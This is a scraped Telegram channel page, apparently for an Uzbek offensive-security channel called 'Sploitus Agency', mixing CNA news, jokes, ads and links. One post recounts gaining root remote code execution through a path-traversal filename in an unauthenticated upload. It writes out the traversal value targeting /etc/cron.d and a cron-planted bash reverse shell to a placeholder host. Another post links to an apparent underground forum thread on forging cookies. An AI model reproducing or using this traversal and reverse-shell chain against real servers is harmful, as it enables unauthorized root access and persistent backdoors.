Sploitus Agency
СтатистикаAssalomu aleykum ✌️ Kanalimizda: — Yangi exploitlar — Tutoriallar — PoC lar — Hujum strategiyalari — Bypasslar O'rta Osiyodagi birinchi CNA tashkiloti rahbari ! Bizdan uzoqlashmang ✌️ Kanalimiz: @sploitus_agency
- Последний пост
- 14 авг.
- Последнее чтение
- 14 авг.
- Постов за неделю
- 10
- Всего постов
- 23
- Тип
- открытый
- Язык
- узбекский
- В каталоге с
- 13 авг.
- 1/24сутки в ленте
- 227
- 1/48двое суток
- 260
- 1/72трое суток
- 280
Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.
Посты
Xabaringiz bor, Turan Security kiberxavfsizlik tashkiloti rasmiy CNA sifatidagi faoliyatini 2026-yil mart oyida boshlagan. Ushbu davr mobaynida biz kiberxavfsizlik tadqiqotchilari va dasturiy ta'minot ishlab chiquvchilari bilan yaqindan hamkorlik qilib, CVE dasturi talablari asosida mas'uliyatli zaifliklarni oshkor etish (Responsible Vulnerability Disclosure) jarayonini qo‘llab-quvvatladik hamda 204 ta CVE (Common Vulnerabilities and Exposures)ni muvaffaqiyatli e'lon qildik. Avgust oyida katta sakrash kuzatildi. Oyning dastlabki 13 kunida TuranSec CNA tomonidan 172 ta CVE e'lon qilingan. Bu ko'rsatkich jahondagi IBM, Red Hat, Microsoft kabi 534 ta CNA tashkilotlari orasida TOP-10 ko‘rsatkichlardan biri hisoblanadi - havola Tushunishingiz uchun bundan 2 yil oldin ham CVE bo'yicha tadqiqotchilar bir nechtani tashkil etardi. Oxirgi 6 oy ichida 50 dan ortiq mahalliy kiberxavfsizlik tadqiqotchilari dunyoning TOP kompaniyalari mahsulotlaridan yangi turdagi zaifliklarni aniqlab 204 ta CVE e'lon qilinishi katta natija hisoblanadi. Buni sohada ishlab yurganlar yaxshi bilishadi, AI rivojlanishi Kiberxavfsizlik sohasida tadqiqot yo'nalishini yanada osonlashtirdi. Biz bilan hamkorlik qilayotgan barcha tadqiqotchilarga o‘z minnatdorchiligimizni bildiramiz. Izlanishdan va o‘sishdan to‘xtamang! Biz faoliyatimizni rivojlantirish va xizmatlarimizni yanada takomillashtirishda davom etamiz. Yaqin bir necha yil ichida O‘zbekistonda minglab yangi kiberxavfsizlik tadqiqotchilari va mutaxassislari yetishib chiqishiga o‘z hissamizni qo‘shishni maqsad qilganmiz. @turansecurity | www.turansec.uz | info@turansec.uz
Bulani aniq mazasi joyidamas. Yoki qanaqadur boshqa paralel dunyoda yashashadi: - barg pul o'rnida o'tadi - rahmatga ijaraga uy berishadi Studentimas, part timemas, full time uchun 5 millionga senior🗿
Bulani aniq mazasi joyidamas. Yoki qanaqadur boshqa paralel dunyoda yashashadi: - barg pul o'rnida o'tadi - rahmatga ijaraga uy berishadi Studentimas, part timemas, full time uchun 5 millionga senior🗿
nimadir yaxshi ishlarni hidi kelyapti )
Node.js. Webshell befoyda. Lekin...👀 Path traversal orqali RCE olish haqida eshitganmisiz? Bug hunting vaqtida unauth upload function topib oldim. Birinchi narsa — stack tekshirdim. Node.js. Demak webshell yuklashni deyarli foydasi yo'q, ko'pchilik shu yerda…
Node.js. Webshell befoyda. Lekin...👀 Path traversal orqali RCE olish haqida eshitganmisiz? Bug hunting vaqtida unauth upload function topib oldim. Birinchi narsa — stack tekshirdim. Node.js. Demak webshell yuklashni deyarli foydasi yo'q, ko'pchilik shu yerda to'xaydi va keyingisiga o'tadi. Lekin men filename parametriga e'tibor berdim. Odatda bu parametr serverda fayl nomini belgilaydi. Sanitize qilinmagan bo'lsa — path traversal. Tekshirdim: filename=../../../../../../etc/passwd Server 200 OK javob qaytardi. Xato yo'q. Endi asosiy savol — process qaysi user bilan ishlayapti? Agar www-data bo'lsa /etc ga yoza olmayman. Root bo'lsa — boshqa gap. filename=../../../../../../etc/cron.d/backdoor file body'ga esa: * * * * * root bash -i >& /dev/tcp/x.x.x.x/4444 0>&1 Server 200 OK. Yuklandi. Endi faqat cron daemon ishlayaptimi degan savol qoldi — va u ishlayotgandi. Netcat'ni yoqib 60 soniya kutdim. connect to [attacker] from [target] uid=0(root) gid=0(root) groups=0(root) CVE kerak emas. 0day kerak emas. Webshell ham kerak emas. Faqat sanitize qilinmagan bitta parametr va root sifatida ishlaydigan bitta process. Asosiy muammo kod ichida emas — uni kim yozganida edi.🙂 Telegram📱 Linkedin 📱 Web✈️
logbit bilan ilk tajriba chiroyli ui aniq va tushunarli sahifalar biroz cyber vibe ) ancha yaxshi g'oya @logbit_ai jamoasiga omad hali hamma funskiyalardan foydalanib ko'rgan holatda o'z fikrlarimni yanada kengroq post qilib yozaman menimcha hammaga qiziq bo'ladi
https://ret2p.lt/categories/
🙂 shunaqa logikani kim o'ylab topgan ekana
15 mln emas undan ancha kam xa nima deymiz endi kuchli xaker ekan )
https://forum.duty-free.cc/threads/7884/ yarim kundan oshiq vaqt ketgan chain haqida kichik post cookie yasash haqida uncha muncha joyda data topish qiyin ))
15 7|-| \/\/3 .- 8|_|5`/
https://thehackernews.com/2026/08/metabase-zero-day-exploited-in-wild.html xay bir maza qilishibtida endi urushmanglar )) A call to "POST /api/session/reset_password" with a 400 status code This is followed by a call to "GET /api/user/current" with a 200 status code
rivojlanish o'sish bor yaxshi ketyapsila yigitlar bosila ✊
без подписи
без подписи
Falcon Academy | Kiberxavfsizlik ta'lim platformasi quyidagi imkoniyatlarni yaratib beradi Brauzeringizdan turib real topshiriqlar yechasiz, zaifliklarni topasiz va haqiqiy vositalar bilan ishlaysiz. 1: Offensive va Defensive Security ka'bi narsalarni o'qib amalda sinab ko'rib o'rganasiz 2: Nazariy testlar va amaliy topshiriqlar har bir bo'lim uchun 3: Har bir bo'limni tugatganingiz uchun sertificate beriladi 4: Kiberxavfsizlikni to'g'ri ketma ketlikda o'rganishingiz uchun yo'l xaritasi chizib beriladi 5: Amaliy topshiriqlarni bajarishingiz uchun 200+ ortiq turli xil bo'limlar bo'yicha labaratoriyalar mavjud 💸 Kiberxavfsizlikni amalda o'rganishingiz uchun www.falcon-academy.uz
без подписи
без подписи
без подписи